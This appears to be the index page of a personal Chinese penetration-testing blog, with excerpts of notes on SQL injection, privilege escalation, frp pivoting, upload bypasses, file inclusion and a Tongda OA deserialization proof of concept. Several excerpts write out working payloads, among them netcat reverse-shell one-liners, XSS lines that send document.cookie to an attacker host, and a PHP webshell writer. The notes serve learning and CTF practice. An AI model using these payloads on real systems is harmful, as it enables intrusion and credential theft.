lan1ocのblog

数据请求类型大致就是以下四种1、数字型(无符号干扰) 1select * from news where id=$id; 2、字符型（有符号干扰） 1select * from news where id='$id'; 3、搜索型（有多符号干扰） 1select * from news where id like '%$id%' 4、框架型（有各种符号干扰） 12select * from news where id=('$id');select * from news where (id='$id'); 请求方式通过功能点来判断注入点，请求方式有以下几种全局变量方法：GET POST SERVER FILES HTTP 头等User-Agent： 使得服务器能够识别客户使用的操作系统，游览器版本等.（很多数据量大的网站中会记 录客户使用的操作系统或浏览器版本等存入数据库中） Cookie： 网站为了辨别用户身份、进行 session...

基本知识点Administrators组可以更改系统配置SYSTEM / LocalSystem 帐户比管理员用户具有更多的权限Local Service用于以“最低”权限运行 Windows 服务的默认帐户。它将通过网络使用匿名连接Network Service用于以“最低”权限运行 Windows 服务的默认帐户。它将使用计算机凭据通过网络进行身份验证 收集密码的常用位置无人值守的 Windows 安装在大量主机上安装 Windows 时，管理员可以使用 Windows...

信息收集假设已经拿下权限，那就先收集下这台机器的信息 主机名1hostname 系统信息1uname -a 内核版本和其他数据的信息1cat /proc/version /etc/issue 系统版本1cat /etc/issue 看进程1234ps -A：查看所有正在运行的进程ps axjf：查看进程树（请参阅下面的树结构，直到运行 ps axjf）ps aux：aux 选项将显示所有用户的进程 （a），显示启动进程的用户 （u），并显示未连接到终端的进程 （x）。查看 ps aux 命令输出，我们可以更好地了解系统和潜在漏洞。 一般直接用 1ps -aux 看环境变量1env 重点看path变量PATH 变量可能具有编译器或脚本语言（例如 Python），可用于在目标系统上运行代码或用于权限提升。 看允许用户使用 root 权限运行哪些命令(鸡肋，要密码)1sudo -l 看用户组1id 也可看其他用户 1id root /etc/passwd1cat...

项目地址怎么用简单来说就是，靶机传个客户端上去，然后自己的攻击机运行服务端 拓扑 靶场设计详情设定以下固定 IP 地址： 内网子网：172.20.0.0/24 出网的机器(frps_server) 在内网中的 IP：172.20.0.3 堡垒机内网中的 IP：172.20.0.10 数据库在内网中的IP：172.20.0.20整个操作思路：靶场总共有三台机子，一台能出网，两台台不出网，出网的那台模拟的是被web渗透成功上传了frpc，然后攻击机上运行frps，两边一运行，代理上了内网流量，攻击机以出网的机子为跳板能访问到不出网的内网机器 所需配置文件文件frps.ini 1bindport = 7000 frpc.ini 123456789101112131415161718192021222324252627[common]server_addr = 192.168.28.142server_port = 7000[internal_target1_web]type = tcplocal_ip = 172.20.0.10local_port =...

首先格式解析是对应的，类型不对无法解析木马前端js验证（验证不通过都不发包）通过判断时间和前端源码分析，如果是仅通过js来过滤危险文件类型，直接禁用js以后再上传 解析缺陷.htaccess 1AddType application/x-http-php .png 将png图片解析成php文件 文件头校验直接在文件内容添加一个文件头就行，一般GIF都允许上传 1GIF89a 黑名单过滤(不在黑名单列表的类型都能上传)双写绕过（或者多写几轮，但是对于递归验证无法绕过）大小写绕过（linux敏感：全大写全小写，windows：可大小写混合）00截断（php小于5.3.4）ctf遇到过，实战没遇到当%00无法被解析的时候，将它url解码一下应该就行了，post请求体中要手动解码，如果是在url上的，会自动解码 白名单验证（只允许上传在白名单列表的类型）条件竞争（实战一般遇不到，ctf比较多）原理：逻辑缺陷了，先上传再判断 1<?php fputs(fopen('1.php','w'),'<?php...

今年怎么说呢，考研了，唉本来感觉能搏一搏，后期身体出问题了，一直睡不着觉，长期睡眠不足导致成天头晕，然后也就没怎么复习了后面一两个月 那么学习呢是这样，其他的也没啥吧，最没印象的一年了感觉是，哦毛到了奖学金，一毛就毛到了大金额啊，6k，确实爽啊，应该是人生中，最容易拿的四位数奖金了吧，哦对了，然后学校里面奖状墙也有我名字了（去年省赛拿奖然后贴上去的），嗯，也算是在学校里留痕了 游戏呢，嗯说实话，今年感觉都没啥，哦有个黑猴，好玩是好玩，可惜我电脑不是很能带的动，太糊了，太卡了，体验不是很好，唉，等下次配个台式玩算了 今年呢就是这样，算是。。。。真的算是一事又无成的一年啊

nc弹shelllinux：法一1mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f 然后再攻击机上： 1sudo rlwrap nc ip port 该命令首先在 /tmp/f 处创建一个命名管道 。然后，它启动 netcat 侦听器，并将侦听器的 input 连接到命名管道的输出。然后，netcat 侦听器的输出（即我们发送的命令）通过管道直接传输到 sh，将 stderr 输出流发送到 stdout，并将 stdout 本身发送到命名管道的输入中，从而完成循环 法二1mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f 然后攻击机上 1sudo rlwrap nc -lvnp...

看版本：/inc/expired.php基本就是先用liqun工具箱吧，有的洞版本太老了就不管了适用于_通达_11.X全版本yii 前台反序列化（测试于11.7，小于12.3）有点难利用，过滤的函数挺多的：exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg不会绕过写shell，放弃了poc： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485<?php namespace yii\rest{ class CreateAction{ ...

利用：cookie盗取、凭据劫持、页面劫持、网络钓鱼、权限维持常见拿cookie payload(基于服务器上的脚本用的url)1<img src=x onerror=alert('1')> 1<script>location.href="http://ip/1.php?cookie="+document.cookie</script> 1<img src="" onerror=location.href="http://ip/1.php?cookie="+document.cookie> 1<body onload="location.href='http://ip/1.php?cookie='+document.cookie"> 1<body...

文件包含的文件的内容会被当成当前脚本语言，与后缀无关本地包含源码中有:php：include、require、include_once、require_once等include在包含中出现错误会触发警告，然后代码继续往下运行require在包含中出现错误会直接报错并退出程序运行java：java.io.File、java.io.FileReader等ASP.NET：System.IO.FileStream、System.IO.StreamReader等 有文件利用无文件利用包含日志文件nginx 日志文件默认在 1/var/log/nginx/access.log 直接file协议包含 1file:///var/log/nginx/access.log 日志一般会记录ua头，所以可以把代码写在ua头，然后包含日志文件，就会显示执行结果 ctfshow...